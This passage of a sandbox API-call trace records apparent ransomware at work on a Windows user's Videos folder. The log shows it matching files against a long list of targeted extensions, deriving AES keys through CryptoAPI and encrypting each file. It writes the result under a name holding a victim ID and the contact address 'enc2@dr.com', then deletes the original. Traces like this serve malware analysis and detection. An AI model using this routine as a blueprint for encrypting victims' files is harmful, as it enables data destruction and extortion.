cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.375] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.376] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.376] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.381] ReadFile (in: hFile=0x384, lpBuffer=0xfc51f8, nNumberOfBytesToRead=0xfb9, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfc51f8*, lpNumberOfBytesRead=0x18c060*=0xfb9, lpOverlapped=0x0) returned 1
	[0199.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.384] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaef0) returned 1
	[0199.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.386] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0199.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.387] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.387] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0199.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.387] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xfb9, dwBufLen=0xfb9 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xfc0) returned 1
	[0199.387] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.387] RtlMoveMemory (in: Destination=0xfdb7e8, Source=0xfc51f8, Length=0xfb9 | out: Destination=0xfdb7e8) 
	[0199.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.388] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdb7e8*, pdwDataLen=0x18bc0c*=0xfb9, dwBufLen=0xfc0 | out: pbData=0xfdb7e8*, pdwDataLen=0x18bc0c*=0xfc0) returned 1
	[0199.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.388] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0199.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.388] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0199.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.388] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0199.388] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.388] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.389] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0199.390] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 83
	[0199.390] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0199.391] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdb7e8*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdb7e8*, lpNumberOfBytesWritten=0x18c068*=0xfc0, lpOverlapped=0x0) returned 1
	[0199.394] CloseHandle (hObject=0x2c0) returned 1
	[0199.394] CloseHandle (hObject=0x384) returned 1
	[0199.394] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf")) returned 1
	[0199.397] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf")) returned 0
	[0199.397] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad1db760, ftCreationTime.dwHighDateTime=0x1d967f3, ftLastAccessTime.dwLowDateTime=0xe22600c0, ftLastAccessTime.dwHighDateTime=0x1d97621, ftLastWriteTime.dwLowDateTime=0xe22600c0, ftLastWriteTime.dwHighDateTime=0x1d97621, nFileSizeHigh=0x0, nFileSizeLow=0x13851, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pYF2.flv", cAlternateFileName="")) returned 1
	[0199.397] lstrcmpW (lpString1="pYF2.flv", lpString2="..") returned 1
	[0199.397] lstrcmpW (lpString1="pYF2.flv", lpString2=".") returned 1
	[0199.397] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.397] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="pYF2.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\pYF2.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\pYF2.flv"
	[0199.397] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\pYF2.flv") returned 37
	[0199.397] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.398] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\pYF2.flv", cchLength=0x25 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv") returned 0x25
	[0199.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.398] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv"
	[0199.398] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv") returned 37
	[0199.398] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.399] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0199.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.399] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.399] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.399] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.399] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.401] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x13851, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x13851, lpOverlapped=0x0) returned 1
	[0199.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.403] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0199.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.405] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0199.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
